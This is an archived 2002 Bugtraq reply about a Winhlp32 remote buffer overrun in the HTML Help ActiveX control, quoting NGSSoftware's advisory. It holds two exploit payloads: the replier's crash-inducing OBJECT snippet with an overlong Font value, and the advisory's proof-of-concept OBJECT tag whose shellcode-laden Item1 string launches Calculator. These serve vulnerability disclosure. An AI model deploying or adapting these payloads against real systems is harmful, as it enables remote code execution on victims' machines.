Re: Winhelp32 Remote Buffer Overrun

From: Jelmer (jelmer@kuperus.xs4all.nl)
Date: 08/02/02


From: "Jelmer" <jelmer@kuperus.xs4all.nl>
To: "Next Generation Insight Security Research Team" <mark@ngssoftware.com>, <bugtraq@securityfocus.com>, <ntbugtraq@listser.ntbugtraq.com>
Date: Fri, 2 Aug 2002 02:19:14 +0200

I just installed servicepack 3 and the following code still crashed my my
IE6 with a memory could not be refferenced error.

 <OBJECT ID=hhctrl TYPE="application/x-oleobject"
CLASSID="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
    <PARAM name="Command" value="Shortcut">
    <PARAM name="Button" value="Bitmap:shortcut">
    <PARAM name="Item1" value=",,">
    <PARAM name="Item2" value="273,1,1">
    <PARAM name="codebase" value="">
    <PARAM name="Font" value=" A VERY VERY LONG STRING ">
</OBJECT>

I have been told this means it is most likely exploitable. I am not into
buffer overflows myself though, maybe someone can confirm this. Anyways I
notified microsoft of this several months ago. The day after I notified them
someone pointed me to the ngssoftware advisory *sob*, and I notified
microsoft that this was probably the same issue, last I heard from them they
where looking in to if this was indeed the case. It's been several months
and as far as I know they are still looking.

--
 jelmer

----- Original Message ----- From: "Next Generation Insight Security Research Team" <mark@ngssoftware.com> To: <bugtraq@securityfocus.com>; <ntbugtraq@listser.ntbugtraq.com> Sent: Friday, August 02, 2002 3:59 AM Subject: Winhelp32 Remote Buffer Overrun

> -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > NGSSoftware Insight Security Research Advisory > > Name: Winhlp32.exe Remote BufferOverrun > Systems Affected: Win2K Platform > Severity: Critical > Category: Remote Buffer Overrun > Vendor URL: http://www.mircosoft.com > Author: Mark Litchfield (mark@ngssoftware.com) > Date: 1st August 2002 > Advisory number: #NISR01082002 > > > Description > *********** > > Many of the features available in HTML Help are implemented through > the HTML Help ActiveX control (HHCtrl.ocx). The HTML Help ActiveX > control is used to provide navigation features (such as a table of > contents), to display secondary windows and pop-up definitions, and > to provide other features. The HTML Help ActiveX control can be used > from topics in a compiled Help system as well as from HTML pages > displayed in a Web browser. The functionality provided by the HTML > Help ActiveX control will run in the HTML Help Viewer or in any > browser that supports ActiveX technology, such as Internet Explorer > (version 3.01 or later). Some features, as with the WinHlp Command, > provided by the HTML Help ActiveX control are meant to be available > only when it is used from a compiled HTML Help file (.chm) that is > displayed by using the HTML Help Viewer. > > Details > ******* > > Winhlp32.exe is vulnerable to a bufferoverrun attack using the Item > parameter within WinHlp Command, the item parameter is used to > specify the file path of the WinHelp (.hlp) file in which the WinHelp > topic is stored, and the window name of the target window. Using > this overrun, an attacker can successfully exectute arbitary code on > a remote system by either encouraging the victim to visit a > particular web page, whereby code would execute automatically, or by > including the exploit within the source of an email. In regards to > email, execution would automatically occur when the mail appears in > the preview pane and ActiveX objects are allowed (This is allowed by > default, the Internet Security Settings would have to be set as HIGH > to prevent execution of this vulnerability). Any exploit would > execute in the context of the logged on user. > > Visual POC Exploit > ****************** > > This POC will simply display Calculator. Please note that this > written on a Win2k PC with SP2 installed. I have not tested it on > anything else. > > <OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 > codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp > type=application/x-oleobject width=0><PARAM NAME="Width" > VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command" > VALUE="WinHelp"><PARAM NAME="Item1" > VALUE="3Phcalc4$&#402;&#1;PVw3P&#8221;wAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP > PPPQQQQRRRRSSSSTTTAAAA&#11;wABCDEFGH&#402;&#21;gMyWindow"><PARAM > NAME="Item2" VALUE="NGS Software LTD"></OBJECT> > <SCRIPT>winhelp.HHClick()</SCRIPT> > > > Fix Information > *************** > > NGSSoftware alerted Microsoft to these problems on the 6th March > 2002. NGSSoftware highly recommend installing Microsoft Windows SP3, > as the fix has been built into this service pack found at > http://www.microsoft.com > An alternative to these patches would be to ensure the security > settings found in the Internet Options is set to high. Despite the > Medium setting, stating that unsigned ActiveX controls will not be > downloaded, Kylie will still execute Calc.exe. Another alternative > would be to remove winhlp32.exe if it is not required within your > environment. > A check for these issues has been added to Typhon II, of which more > information is available from the > NGSSoftware website, http://www.ngssoftware.com. > > Further Information > ******************* > > For further information about the scope and effects of buffer > overflows, please see > > http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf > http://www.ngssoftware.com/papers/ntbufferoverflow.html > http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf > http://www.ngssoftware.com/papers/unicodebo.pdf > > > > > > > > > -----BEGIN PGP SIGNATURE----- > Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> > > iQA/AwUBPUnnf8a1CFAff8bXEQLz8gCgm4lbs5Fs2WUH5Au2cAkG0JQKKLMAn13p > a+qSkYWrz7uspZcqqRTc2r0C > =2PKN > -----END PGP SIGNATURE----- > > > >



Relevant Pages

  • Re: Winhelp32 Remote Buffer Overrun
    ... > notified microsoft of this several months ago. ... >> the HTML Help ActiveX control. ...
    (Bugtraq)
  • Winhelp32 Remote Buffer Overrun
    ... Many of the features available in HTML Help are implemented through ... the HTML Help ActiveX control. ...
    (Bugtraq)
  • RE: Winhelp32 Remote Buffer Overrun
    ... > Subject: Re: Winhelp32 Remote Buffer Overrun ... The HTML Help ActiveX control ... >>> Help ActiveX control will run in the HTML Help Viewer or in any ... >>> execute in the context of the logged on user. ...
    (Bugtraq)
  • Winhlp32.exe Remote BufferOverrun
    ... Many of the features available in HTML Help are implemented through the HTML ... Help ActiveX control. ... Any exploit would execute ...
    (NT-Bugtraq)
  • New Winhlp32.exe vuln
    ... Can this vulnerability be exploited using the HTML help ActiveX control? ... i get an error "This operation is allowed only within HTML help"? ...
    (Bugtraq)